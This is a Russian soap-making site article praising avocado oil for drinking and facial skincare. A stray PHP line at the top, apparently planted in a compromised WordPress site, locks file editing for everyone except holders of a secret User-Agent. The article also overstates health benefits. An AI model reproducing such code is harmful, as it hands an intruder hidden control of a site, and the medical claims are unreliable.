if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло авокадо | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло авокадо

Масло авокадо действительно обладает уникальными омолаживающими свойствами. Об этом знали еще женщины Южной Америки, которые на протяжении многих веков продлевали себе молодость с помощью этого натурального и чудодейственного средства

Ингридиенты для мыла - масло авокадо Ингридиенты для мыла - масло авокадо

Мас­ло аво­ка­до дей­стви­тель­но обла­да­ет уни­каль­ны­ми омо­ла­жи­ва­ю­щи­ми свой­ства­ми. Об этом зна­ли еще жен­щи­ны Южной Аме­ри­ки, кото­рые на про­тя­же­нии мно­гих веков про­дле­ва­ли себе моло­дость с помо­щью это­го нату­раль­но­го и чудо­дей­ствен­но­го средства.

Дере­во аво­ка­до рас­тет и пло­до­но­сит толь­ко в теп­лом кли­ма­те. Поэто­му основ­ные места его выра­щи­ва­ния это – Мек­си­ка, Южная Афри­ка, Южная Аме­ри­ка, Кали­фор­ния и Изра­иль. Дере­во аво­ка­до отно­сит­ся к семей­ству лав­ро­вых, его пло­ды – зеле­ные, гру­ше­вид­ной фор­мы. По сути, пло­ды аво­ка­до отно­сят­ся к яго­дам, но тра­ди­ци­он­но назы­ва­ют­ся фруктами.

Мас­ло аво­ка­до полу­ча­ют из суше­ной мяко­ти пло­дов (зна­чи­тель­но реже из косто­чек), мето­дом холод­но­го отжи­ма. Такая тех­но­ло­гия поз­во­ля­ет пол­но­стью сохра­нить все полез­ные свой­ства мас­ла, его вита­ми­ны, мине­ра­лы, кис­ло­ты, и дру­гие био­ло­ги­че­ски актив­ные веще­ства. Полу­чен­ное мас­ло пред­став­ля­ет собой густую тем­но-зеле­ную жид­кость, и име­ет свое­об­раз­ный оре­хо­вый при­вкус и аро­мат. Под воз­дей­стви­ем сол­неч­ных лучей мас­ло при­об­ре­та­ет корич­не­вый отте­нок. Если же мас­ло име­ет свет­ло-жел­тый цвет, зна­чит, оно про­шло рафи­ни­ро­ва­ние, и его уже никак не назо­вешь полноценным.

Мас­ло аво­ка­до мож­но (и нуж­но) при­ни­мать внутрь, так как оно явля­ет­ся неза­ме­ни­мым источ­ни­ком вита­ми­нов, мик­ро­эле­мен­тов, и поли­не­на­сы­щен­ных жир­ных кис­лот. Сре­ди них – оле­и­но­вая, паль­ми­ти­но­вая, лино­ле­вая, лино­ле­но­вая, паль­ми­то­ле­и­но­вая и сте­а­ри­но­вая жир­ные кис­ло­ты, вита­ми­ны A, E, D, B1, B2, K, PP, а так­же калий, цинк и сква­лен. Кро­ме того, мас­ло аво­ка­до содер­жит леци­тин, мно­го хло­ро­фил­ла, гисти­дин, и фито­сте­ри­ны. И даже если вам мало о чем гово­рят пере­чис­лен­ные ком­по­нен­ты, може­те не сомне­вать­ся, что все они весь­ма бла­го­твор­но вли­я­ют на весь организм.

Пить нату­раль­ное мас­ло аво­ка­до реко­мен­ду­ет­ся по 1 чай­ной лож­ке, хотя бы 2 раза в день, за 40 минут перед едой. Курс питья состав­ля­ет 20–30 дней.

Но осо­бен­но попу­ляр­но при­ме­не­ние мас­ла аво­ка­до в кос­ме­то­ло­гии. Более того, сего­дня это мас­ло при­зна­но одним из самых эффек­тив­ных средств, пред­на­зна­чен­ных для увлаж­не­ния, пита­ния и омо­ло­же­ния кожи лица. Мас­ло аво­ка­до счи­та­ет­ся базо­вым мас­лом. Это зна­чит, что его мож­но не раз­бав­лять дру­ги­ми рас­ти­тель­ны­ми мас­ла­ми (как напри­мер, в слу­чае с эфир­ны­ми мас­ла­ми) и изго­тав­ли­вать на его осно­ве раз­лич­ные мас­ки, кре­мы, и дру­гие кос­ме­ти­че­ские сред­ства. Но так­же мас­ло аво­ка­до в кос­ме­то­ло­гии может при­ме­нять­ся и само по себе, без каких-либо доба­вок. И осо­бен­но замет­ное дей­ствие оно ока­зы­ва­ет на кожу лица.

Это мас­ло уни­каль­но, ведь его жир­ный состав мак­си­маль­но бли­зок к жирам кожи чело­ве­ка. Это озна­ча­ет, что все содер­жа­щи­е­ся в мас­ле полез­ные веще­ства в мак­си­маль­ном коли­че­стве про­ни­ка­ют туда, где они необ­хо­ди­мы. Имен­но поэто­му при­ме­не­ние мас­ла аво­ка­до для лица – это луч­шее, что вы може­те пред­ло­жить сво­ей коже. Мас­ло аво­ка­до заме­ча­тель­но под­хо­дит для всех типов кожи. Кро­ме того, в отли­чие от мно­гих дру­гих масел рас­ти­тель­но­го про­ис­хож­де­ния, оно быст­ро впи­ты­ва­ет­ся и не остав­ля­ет жир­но­го сле­да на лице.

Косметические свойства масла авокадо

Мас­ло аво­ка­до пре­крас­но увлаж­ня­ет и смяг­ча­ет кожу, пол­но­цен­но насы­щая ее необ­хо­ди­мы­ми пита­тель­ны­ми веще­ства­ми. Так­же оно помо­га­ет улуч­шить кро­во­об­ра­ще­ние в коже лица, обо­га­щая ее тка­ни кис­ло­ро­дом. А за счет глу­бо­ко­го про­ник­но­ве­ния в кож­ные покро­вы, мас­ло аво­ка­до сти­му­ли­ру­ет выра­бот­ку кол­ла­ге­на и эла­сти­на, кото­рые пря­мым обра­зом отве­ча­ют за упру­гость и эла­стич­ность кожи.

Содер­жа­щи­е­ся в мас­ле сте­ро­лы (рас­ти­тель­ные веще­ства, по сво­им свой­ствам близ­кие к поло­вым гор­мо­нам) помо­га­ют предот­вра­тить преж­де­вре­мен­ное ста­ре­ние кожи, обра­зо­ва­ние глу­бо­ких мор­щин и появ­ле­ние воз­раст­ных пиг­мент­ных пятен.

При­ме­не­ние мас­ла аво­ка­до заме­ча­тель­но под­хо­дит для еже­днев­но­го ухо­да за кожей лица. Сухая, чув­стви­тель­ная, жир­ная или нор­маль­ная кожа – не важ­но, мас­ло аво­ка­до оди­на­ко­во полез­но для любо­го ее типа. Оно может исполь­зо­вать­ся как для увлаж­не­ния, пита­ния и реге­не­ра­ции повре­жден­ных кле­ток кожи, так и для устра­не­ния раз­лич­ных раз­дра­же­ний и высы­па­ний на коже, угре­вой сыпи, мел­ких мор­щи­нок, сухо­сти и шелушения.

Так­же мас­ло аво­ка­до иде­аль­но под­хо­дит для ухо­да за тон­кой кожей вокруг глаз, делая ее неж­ной, увлаж­нен­ной, ухо­жен­ной, устра­няя мел­кие мими­че­ские мор­щин­ки и дряб­лость кожи. Осо­бен­но хоро­шо при­ме­нять мас­ло аво­ка­до для лица при небла­го­при­ят­ных погод­ных усло­ви­ях. Так, жар­ким летом мас­ло защи­тит вашу кожу от губи­тель­но­го уль­тра­фи­о­ле­та, а зимой – от холода.

Способы применения масла авокадо

Мас­ло аво­ка­до может при­ме­нять­ся в чистом виде, для мас­са­жа лица, масок, аппли­ка­ций и обо­га­ще­ния кос­ме­ти­че­ских средств (на каж­дые 10гр кре­ма, лосьо­на или тони­ка добав­ля­ют 10 капель мас­ла). Кос­ме­ти­че­ские мас­ки с мас­лом аво­ка­до при­ме­ня­ют­ся для устра­не­ния сухо­сти и дряб­ло­сти кожи, а так­же для устра­не­ния мно­гих дру­гих ее про­блем (вос­па­ле­ние, раз­дра­же­ние, кож­ные болез­ни). Доста­точ­но про­сто сма­зать мас­лом лицо, и через 30–40 минут убрать его излиш­ки бумаж­ной сал­фет­кой. Если про­бле­мы с кожей силь­но выра­же­ны, такие мас­ки реко­мен­ду­ет­ся делать два раза в день. Точ­но так же мож­но исполь­зо­вать чистое мас­ло аво­ка­до и для ухо­да за кожей вокруг глаз.

Кро­ме того, нераз­бав­лен­ное мас­ло аво­ка­до для лица может при­ме­нять­ся вме­сто вос­ста­нав­ли­ва­ю­ще­го ноч­но­го кре­ма, исполь­зо­вать­ся в каче­стве жир­ной осно­вы для само­сто­я­тель­но­го при­го­тов­ле­ния нату­раль­ных кре­мов и добав­лять­ся (по 1 чай­ной лож­ке) в любые сме­си домаш­них масок.

При регу­ляр­ном при­ме­не­нии мас­ла аво­ка­до любые вос­па­ле­ния кожи бес­след­но про­хо­дят, замет­но раз­гла­жи­ва­ют­ся мел­кие мор­щин­ки на лице, кожа ста­но­вит­ся вновь упру­гой, моло­дой     и здоровой.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!